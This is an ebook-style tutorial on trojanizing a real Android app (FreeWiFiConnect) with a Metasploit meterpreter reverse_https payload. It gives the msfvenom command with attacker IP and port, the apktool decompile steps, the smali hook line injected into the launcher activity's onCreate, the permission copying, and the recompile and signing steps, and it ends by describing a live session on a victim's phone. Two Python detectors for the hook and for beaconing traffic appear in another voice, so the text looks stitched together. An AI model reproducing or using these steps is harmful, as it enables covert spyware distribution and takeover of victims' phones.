
IND ANDROID_HACKING BY:-

SHUBHAM YADAV

Attention Hackers!
When you read this book, we would absolutely LOVE to hear your comments on it.

- Is it useful?
- Is it well written?
- Did you find anything to correct?
- Is there anything missing?
- Is there anything you want to see more of?
- Is there anything you want to see less of?

Send your comments to shubhamyadav2468cyberexpert@gmail.com and mention the word "book" in the subject header.

Thank you!

I AM A CERTIFIED ETHICAL HACKER.

I AM CERTIFIED IN THE HACKING FIELD.

Published by Shubham Yadav



Table of Contents

Install Instructions
  Quick Check

Installation for Apktool
  Linux
  Windows
  Mac OS X
  Overview

Generate the Meterpreter payload
  Singles
  Stagers
  Stages
  Msfvenom VS MSFpayload

Backdooring App
  Decompile the payload and the original apk
  Copy The Payload Files
  Hook injection inside ".SMALI CODE"
  INJECT the NECESSARY PERMISSIONS
  RECOMPILE the ORIGINAL APK
  SIGN the APK

Meterpreter Session

Install Instructions

Quick Check
1. Is Java 1.7 installed? If yes, go to step 2; if not, go to step 3.
2. Does executing java -version on the command line / command prompt return 1.7?
3. If not, please install Java 7 and make it the default.

Installation for Apktool


Go to official page for Apktool: https://ibotpeaches.github.io/Apktool/install

Linux:
1. Download the Linux wrapper script (Right click, Save Link As apktool )
2. Download apktool-2 (find newest here)
3. Make sure you have the 32bit libraries ( ia32-libs ) downloaded and installed by your Linux package manager, if you are on a 64bit Unix system.
4. (This helps provide support for the 32bit native binary aapt, which is required by apktool)
5. Rename the downloaded jar to apktool.jar
6. Move both files ( apktool.jar & apktool ) to /usr/local/bin (root needed)
7. Make sure both files are executable ( chmod +x )
8. Try running apktool via cli

We will also need some libraries and tools in the following steps, so I think it's better if you install them right now. To install the required libraries, enter this command at the console:

apt-get install lib32stdc++6 lib32ncurses5 lib32z1

Windows:
1. Download the Windows wrapper script (Right click, Save Link As apktool.bat )
2. Download apktool_2.2.0.jar (find newest here)
3. Rename the downloaded jar to apktool.jar
4. Move both files ( apktool.jar & apktool.bat ) to your Windows directory (Usually C:\Windows )
5. If you do not have access to C:\Windows , you may place the two files anywhere, then add that directory to your Environment Variables System PATH variable.
6. Try running apktool via command prompt

Mac OS X:
1. Download the Mac wrapper script (Right click, Save Link As apktool )
2. Download apktool-2 (find newest here)
3. Rename the downloaded jar to apktool.jar
4. Move both files ( apktool.jar & apktool ) to /usr/local/bin (root needed)
5. Make sure both files are executable ( chmod +x )
6. Try running apktool via cli

Overview:
We know this tutorial is a little bit long, so let me tell you what we are going to do here.
1. Generate the Meterpreter payload
2. Decompile the payload and the original apk
3. Get a clean apk file from any site
4. Copy the payload smali folder to the original apk
5. Inject the hook into the appropriate activity of the original apk
6. Inject the permissions in the AndroidManifest.xml file
7. Re-compile the original apk
8. Sign the apk using Jarsigner
9. Put the fake apk file on the network
10. Run the Meterpreter session
11. How to discover it on your network and defend yourself

Generate the Meterpreter payload

A payload in Metasploit refers to an exploit module. There are three different types of payload modules in the Metasploit Framework: Singles, Stagers, and Stages. These different types allow for a great deal of versatility and can be useful across numerous types of scenarios. Whether or not a payload is staged is represented by '/' in the payload name. For example, "windows/shell_bind_tcp" is a single payload with no stage, whereas "windows/shell/bind_tcp" consists of a stager (bind_tcp) and a stage (shell).

Contents

1- Singles
2- Stagers
3- Stages

Singles:
Singles are payloads that are self-contained and completely standalone. A Single payload
can be something as simple as adding a user to the target system or running calc.exe.
These kinds of payloads are self-contained, so they can be caught with non-metasploit
handlers such as netcat.

Stagers:
Stagers setup a network connection between the attacker and victim and are designed to be
small and reliable. It is difficult to always do both of these well so the result is multiple
similar stagers. Metasploit will use the best one when it can and fall back to a less-preferred
one when necessary.

Windows NX vs NO-NX Stagers

- Reliability issue for NX CPUs and DEP
- NX stagers are bigger (VirtualAlloc)
- Default is now NX + Win7 compatible

Stages:
Stages are payload components that are downloaded by Stagers modules. The various
payload stages provide advanced features with no size limits such as Meterpreter, VNC
Injection, and the iPhone ‘ipwn’ Shell.

Payload stages automatically use 'middle stagers'

- A single recv() fails with large payloads
- The stager receives the middle stager
- The middle stager then performs a full download
- Also better for RWX

Msfvenom VS MSFpayload
msfpayload is a command line instance of Metasploit that is used to generate and output all
of the various types of shellcode that are available in Metasploit. The most common use of
this tool is for the generation of shellcode for an exploit that is not currently in the
Metasploit Framework or for testing different types of shellcode and options before
finalizing an Exploit Module.

Msfvenom is the combination of payload generation and encoding. It replaced msfpayload and msfencode on June 8th 2015.

Now that we understand what a payload is, let's generate our payload with the following command line:

msfvenom --platform android -p android/meterpreter/Payload_Type LHOST=(IP_Address) LPORT=(Incoming_Port) -o meterpreter.apk

Explanation:
--platform: The platform of the payload (Android, Windows, Linux … )

-p: Payload to use.

LHOST: Your localhost IP Address

LPORT: Local Port / Incoming_Port

-o: path for output file and file name

Note: Replace Payload_Type with any of the following available payloads.

1. reverse_tcp
2. reverse_http
3. reverse_https

To see what payloads are available from Framework, you can do:

You can use any one you like, I'm going to use reverse_https as an example.

sudo msfvenom --platform android -p android/meterpreter/reverse_https LHOST=192.168.56.100 LPORT=5555 -o meterpreter.apk

Replace IP_Address by the IP address to which the payload is going to connect back, i.e. the IP address of the attacker's system. If you are going to perform this attack over a local network (e.g. if the victim and attacker are connected to the same WiFi hotspot), your local IP will suffice. To know what your local IP is, run the command –

If you are going to perform this attack over the Internet, you have to use your public IP address, and configure your router properly (set up port forwarding) so that your system is accessible from the Internet. To know your public IP, just google "My IP" and Google will help you out.

Replace Incoming_Port with the port number which you want to be used by the payload to connect to your system. This can be any valid port except the reserved ones like port 80 (HTTP). I'm going to use 5555 as an example.

So run the command, replacing the keywords with appropriate values, and MSFVenom will generate a payload "meterpreter.apk" in the root directory. Note that we specified the output file name using the "-o meterpreter.apk" argument in the command, so if you like, you can name it anything else.

Backdooring App
Decompile the payload and the original apk:
Now we have to decompile the APKs; for this we are going to use APKTool. It decompiles the code to a fairly human-readable format and saves it in .smali files, and also successfully extracts the .xml files. Assuming you have already installed the latest apktool and also have the original apk file in the root directory, run the following commands –

apktool d -o Desktop/meterpreter "Desktop/meterpreter.apk"

apktool d -o Desktop/FreeWiFiConnect "Desktop/FreeWiFiConnect.apk"

It will decompile the payload to "Desktop/meterpreter" and the original apk to the "Desktop/FreeWiFiConnect" directory.

Copy The Payload Files:


Now we have to copy the payload files to the original application folder. Go to "Desktop/meterpreter/smali/com/metasploit/stage" and copy all the .smali files whose names contain the word 'payload'.

Now paste them in "Desktop/FreeWiFiConnect/smali/com/metasploit/stage".

Note that this folder does not exist, so you have to create it.

Hook injection inside “.SMALI CODE”:


In the previous step, we just copied the payload codes inside the original apk, so that when
the original apk is recompiled, it will contain the payload files. But that doesn't mean that
the payload will be run. To ensure that the payload runs, we have to inject a hook in the
“FreeWiFiConnect” apk's .smali code.

Let's search for the activities section in the AndroidManifest.xml file, located inside the "Desktop/FreeWiFiConnect" folder, using any text editor.

You can use CTRL+F to search for an <activity> tag which contains both the lines –

<action android:name="android.intent.action.MAIN"/>

<category android:name="android.intent.category.LAUNCHER"/>

Follow my screenshot; I used the vi editor.

Note this "android:name" attribute's value. In my case, as you can see from the previous screenshot, it is "com.mentisco.freewificonnect.activity.SplashActivity".

This attribute shows us where we are going to inject the hook: replace the dots with slashes and add .smali at the end (follow the screenshot), which gives the path of that activity's .smali file.

Or using gedit.

Now that we have the name of the activity we want to inject the hook into, let's edit the .smali code of that activity with vi or gedit.

Now search for the following line in the smali code using CTRL+F –

;->onCreate(Landroid/os/Bundle;)V

When you locate it, paste the following code in the line next to it –

invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V

What we are doing here is, inserting a code which starts the payload alongside the existing
code which is executed when the activity starts. Now, save the edited smali file.

INJECT the NECESSARY PERMISSIONS:

If we do not mention all the additional permissions that our payload is going to need, it
cannot function properly. While installing an app, these permissions are shown to the user.
But most of the users don't care to read all those boring texts, so we do not have to worry
about that much.

These permissions are also listed in the previously encountered AndroidManifest file. So
let's open the AndroidManifest.xml of both the original app and the payload from the
respective folders. The permissions are mentioned inside <uses-permission> tag as an
attribute 'android:name'. Copy the additional permission lines from the Payload's
AndroidManifest to the original app's one. But be careful that there should not be any
duplicate.

After adding the additional ones from the Payload's AndroidManifest, my Desktop/FreeWiFiConnect/AndroidManifest.xml looks like this:
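The two changes described in the hook-injection and permissions sections leave fixed traces in a decompiled APK: a static call into the Lcom/metasploit/stage/Payload; class inside an activity's onCreate(), and <uses-permission> entries that the clean app never declared. The following is an added example of an audit script (my own code, not part of this tutorial, apktool or Metasploit) that scans an "apktool d" output tree for both indicators and diffs its manifest against a known-good copy. The smali snippet and the two manifests below are constructed sample data; the function and file names are my own assumptions.

```python
import os
import re
import tempfile
import xml.etree.ElementTree as ET

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"
# Signature of the hook this tutorial inserts into onCreate(): any static call
# into the Metasploit stage package (Payload;->start(Landroid/content/Context;)V).
HOOK_RE = re.compile(r"^\s*invoke-static\b.*Lcom/metasploit/stage/.*$", re.M)


def find_hooks(smali_text):
    """Return every smali line that calls into the Metasploit stage package."""
    return [m.group(0).strip() for m in HOOK_RE.finditer(smali_text)]


def declared_permissions(manifest_xml):
    """android:name values of all <uses-permission> tags in a manifest."""
    root = ET.fromstring(manifest_xml)
    return {el.get(ANDROID_NS + "name") for el in root.iter("uses-permission")}


def permission_delta(reference_xml, suspect_xml):
    """Permissions the suspect manifest declares that the known-good one does not."""
    return declared_permissions(suspect_xml) - declared_permissions(reference_xml)


def audit_apk_tree(root_dir, reference_manifest_xml=None):
    """Walk an 'apktool d' output tree; report stage dir, hook calls and added permissions."""
    report = {"stage_dir": False, "hooks": [], "added_permissions": set()}
    stage_dir = os.path.join(root_dir, "smali", "com", "metasploit", "stage")
    report["stage_dir"] = os.path.isdir(stage_dir)
    for dirpath, _, files in os.walk(root_dir):
        for name in files:
            if not name.endswith(".smali"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                for line in find_hooks(fh.read()):
                    report["hooks"].append((os.path.relpath(path, root_dir), line))
    manifest = os.path.join(root_dir, "AndroidManifest.xml")
    if reference_manifest_xml and os.path.isfile(manifest):
        with open(manifest, encoding="utf-8") as fh:
            report["added_permissions"] = permission_delta(reference_manifest_xml, fh.read())
    return report


# Constructed sample data (not taken from any real app): an activity's onCreate()
# after the tutorial's hook line was inserted, plus a clean and a modified manifest.
SAMPLE_SMALI = """\
.method protected onCreate(Landroid/os/Bundle;)V
    .locals 0
    invoke-super {p0, p1}, Landroid/app/Activity;->onCreate(Landroid/os/Bundle;)V
    invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
    return-void
.end method
"""
REFERENCE_MANIFEST = """\
<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.example.app">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
</manifest>
"""
SUSPECT_MANIFEST = """\
<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.example.app">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
  <uses-permission android:name="android.permission.RECORD_AUDIO"/>
  <uses-permission android:name="android.permission.READ_SMS"/>
</manifest>
"""


def demo_report():
    """Write the constructed samples into a temporary apktool-style tree and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        os.makedirs(os.path.join(tmp, "smali", "com", "metasploit", "stage"))
        act_dir = os.path.join(tmp, "smali", "com", "example", "app")
        os.makedirs(act_dir)
        with open(os.path.join(act_dir, "SplashActivity.smali"), "w", encoding="utf-8") as fh:
            fh.write(SAMPLE_SMALI)
        with open(os.path.join(tmp, "AndroidManifest.xml"), "w", encoding="utf-8") as fh:
            fh.write(SUSPECT_MANIFEST)
        return audit_apk_tree(tmp, REFERENCE_MANIFEST)


if __name__ == "__main__":
    # Real use: audit_apk_tree("Desktop/FreeWiFiConnect", open("clean/AndroidManifest.xml").read())
    for key, value in demo_report().items():
        print(key, value)
```

The manifest diff needs a trustworthy reference copy (the vendor's own build decompiled the same way); without one, only the smali checks apply. The class-path pattern is deliberately broad (any call into com/metasploit/stage) so that renaming only the Payload class does not defeat it, but a repackaged payload that moves the package entirely would need a different signature.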

RECOMPILE the ORIGINAL APK:


Now we just have to recompile the backdoored app into an installable apk. Run the following command –

apktool b Desktop/FreeWiFiConnect

You will now have the compiled apk inside the "Desktop/FreeWiFiConnect/dist" directory. But we still have one step to finish the backdoored app: signing the apk.

SIGN the APK:


This is also a very important step, as in most cases an unsigned apk cannot be installed.

In this case we are going to sign the apk using the default Android debug key. Just run the following command –

sudo java -jar sign.jar FreeWiFiConnect.apk

Be sure to replace FreeWiFiConnect.apk in the above command with the path to your backdoored apk file.

Meterpreter Session:
Now, after the victim has received the backdoored app and installed and run it on his phone, you can get a working meterpreter session on his phone!
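The overview's closing item promises a way to discover this on your own network. The session described here is a phone repeatedly connecting back to LHOST:LPORT (192.168.56.100:5555 in the example above) on a port no normal app uses, and an HTTP-based meterpreter keeps polling its handler at a fairly steady interval. The following is an added example of a detector for that shape (my own code, not part of this tutorial or of Metasploit): it groups connection records by client, destination and port, skips common service ports, and flags flows with many regularly spaced connections. The record format, the sample log and the COMMON_PORTS list are constructed assumptions for the demo.

```python
from collections import defaultdict
from statistics import mean, pstdev

# Ports a phone legitimately talks to all day; flows to them are not scored.
# 5228 is the Google Play services push channel. Assumption: tune this for your network.
COMMON_PORTS = {53, 80, 123, 443, 5228}


def parse_records(lines):
    """Parse constructed records of the form '<epoch> <src_ip> <dst_ip> <dst_port>'."""
    records = []
    for line in lines:
        if not line.strip():
            continue
        ts, src, dst, port = line.split()
        records.append((float(ts), src, dst, int(port)))
    return records


def find_beacons(records, min_count=5, max_jitter=0.25):
    """Return (src, dst, port, count, mean_gap_seconds) for flows that look like beaconing.

    A flow is flagged when one client reaches one host:port at least min_count times on
    an uncommon port and the gaps between connections are regular (coefficient of
    variation <= max_jitter). That is the shape a polling reverse handler check-in leaves.
    """
    flows = defaultdict(list)
    for ts, src, dst, port in records:
        flows[(src, dst, port)].append(ts)
    hits = []
    for (src, dst, port), times in flows.items():
        if port in COMMON_PORTS or len(times) < min_count:
            continue
        times.sort()
        gaps = [later - earlier for earlier, later in zip(times, times[1:])]
        avg = mean(gaps)
        if avg > 0 and pstdev(gaps) / avg <= max_jitter:
            hits.append((src, dst, port, len(times), round(avg, 1)))
    return hits


# Constructed sample log: a phone (192.168.56.101) checking in to a handler on
# 192.168.56.100:5555 (the LHOST/LPORT values used in this tutorial's example) about
# every ten seconds, mixed with ordinary HTTPS traffic and a one-off connection.
SAMPLE_LOG = """\
1700000000 192.168.56.101 192.168.56.100 5555
1700000003 192.168.56.101 203.0.113.10 443
1700000010 192.168.56.101 192.168.56.100 5555
1700000012 192.168.56.102 192.168.56.1 8080
1700000021 192.168.56.101 192.168.56.100 5555
1700000030 192.168.56.101 192.168.56.100 5555
1700000040 192.168.56.101 192.168.56.100 5555
1700000045 192.168.56.101 203.0.113.10 443
1700000051 192.168.56.101 192.168.56.100 5555
"""


def demo_hits():
    """Run the detector over the constructed sample log."""
    return find_beacons(parse_records(SAMPLE_LOG.splitlines()))


if __name__ == "__main__":
    for src, dst, port, count, gap in demo_hits():
        print(f"{src} -> {dst}:{port}  {count} connections, ~{gap}s apart")
```

On a real network the records would come from the router's connection log or a flow export rather than a string, and the port allow-list and jitter threshold need tuning per environment; a handler listening on 443 would pass the port filter and be caught only by the regularity check, so the two conditions should be reviewed separately rather than ANDed when investigating.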

For more, please let me know by mailing me at: shubhamyadav2468cyberexpert@gmail.com.

Thank You.

You can also visit my blog: shubham2152003yadav.blogspot.in
